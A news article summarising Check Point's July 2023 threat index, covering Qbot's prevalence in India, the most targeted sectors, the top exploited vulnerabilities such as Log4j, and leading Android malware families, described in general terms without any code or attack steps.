In its latest Global Threat Index report, Check Point Software Technologie, a prominent cybersecurity solutions provider, has highlighted the alarming impact of Qbot malware on India during the month of July 2023.
Qbot, also known as Qakbot, is a multipurpose malware that first emerged in 2008. This malware has resurfaced with a significant impact of 10.98 percent on India, demonstrating its potency in carrying out cyber attacks.
Qbot is notorious for its capabilities, which include stealing user credentials, logging keystrokes, exfiltrating cookies from web browsers, monitoring banking activities, and deploying additional malicious software. Often propagated through spam emails, Qbot employs sophisticated anti-VM (virtual machine), anti-debugging, and anti-sandbox techniques to elude detection and analysis. Since its reemergence in 2022, it has gained notoriety as one of the most widespread Trojans.
The report also delves into the industries most affected by cyber threats in India during this period. The Utilities sector led the list of the most targeted industries, followed closely by Transportation, Software vendors, and Retail/Wholesale sectors. These findings underscore the pervasive nature of cyber threats across various sectors of the Indian economy.
Maya Horowitz, Vice President of Research at Check Point Software, stressed the challenges organizations face during this time of the year, characterized by altered staffing levels due to vacations. She recommended that businesses implement automated and consolidated security processes to effectively manage threats and risks, alongside user education to enhance overall cybersecurity practices.
Furthermore, Check Point’s research identified the most exploited vulnerabilities worldwide. “Web Servers Malicious URL Directory Traversal” ranked as the top exploited vulnerability, affecting 49 percent of organizations globally. This was followed by “Apache Log4j Remote Code Execution” impacting 45 percent of organizations and “HTTP Headers Remote Code Execution” with a global impact of 42 percent.
Regarding malware families, Qbot emerged as the most prevalent during this period, impacting 5 percent of organizations worldwide. Formbook followed closely with a global impact of 4 percent, while Remcos rounded out the top three with a global impact of 2 percent.
Qbot’s resurgence in the cyber threat landscape serves as a reminder of the evolving nature of malware and the importance of robust cybersecurity measures to safeguard sensitive data and critical systems.
In an interconnected world where cyber threats continue to grow in sophistication, organizations must remain vigilant and proactive in fortifying their digital defenses to counteract these malicious activities effectively.
Education and Research have retained their unfortunate distinction as the most exploited industry globally, closely followed by Government and Military, and Healthcare sectors.
The report also delves into the vulnerabilities that have been most extensively targeted by cybercriminals in the past month. Topping the list is the “Web Servers Malicious URL Directory Traversal” vulnerability, which affected a staggering 49 percent of organizations across the globe. Following closely, the “Apache Log4j Remote Code Execution” vulnerability held a 45 percent impact rate, while the “HTTP Headers Remote Code Execution” vulnerability exhibited a global impact of 42 percent.
Web Servers Malicious URL Directory Traversal is a critical vulnerability stemming from input validation errors within web servers. Exploiting this vulnerability enables unauthenticated remote attackers to access or unveil arbitrary files on the vulnerable server.
Apache Log4j Remote Code Execution (CVE-2021-44228) marks another significant vulnerability, afflicting Apache Log4j. Successful exploitation of this vulnerability grants remote attackers the ability to execute arbitrary code on the compromised system.
HTTP Headers Remote Code Execution (CVE-2020-10826, CVE-2020-10827, CVE-2020-10828, CVE-2020-13756) involves leveraging HTTP headers to inject and execute arbitrary code on victim machines, underscoring the importance of securing these entry points.
The report also delves into the realm of mobile malware, where Anubis has emerged as the leading contender in the “Top Mobile Malwares” category. Anubis, initially a banking Trojan targeting Android mobile devices, has evolved into a versatile threat encompassing Remote Access Trojan (RAT) capabilities, keylogging, audio recording, and ransomware functionalities. The malware has infiltrated numerous applications within the Google Store.
SpinOk, an Android software module, holds the second position among prevalent mobile malwares. Operating as spyware, SpinOk collects data about files stored on devices and transfers them to malicious actors. It was shockingly discovered in over 100 Android apps, with downloads exceeding 421 million until May 2023.
AhMyth, a Remote Access Trojan (RAT) first identified in 2017, rounds out the top three. Distributed via Android apps available on various platforms, AhMyth is notorious for its ability to harvest sensitive data, log keystrokes, capture screenshots, send SMS messages, and even activate the camera to pilfer sensitive information.
The report’s findings underscore the persistent need for industries, organizations, and individuals to remain vigilant against evolving cyber threats. Implementing robust security measures and staying informed about the latest vulnerabilities and malware trends is crucial in safeguarding sensitive data and digital assets.
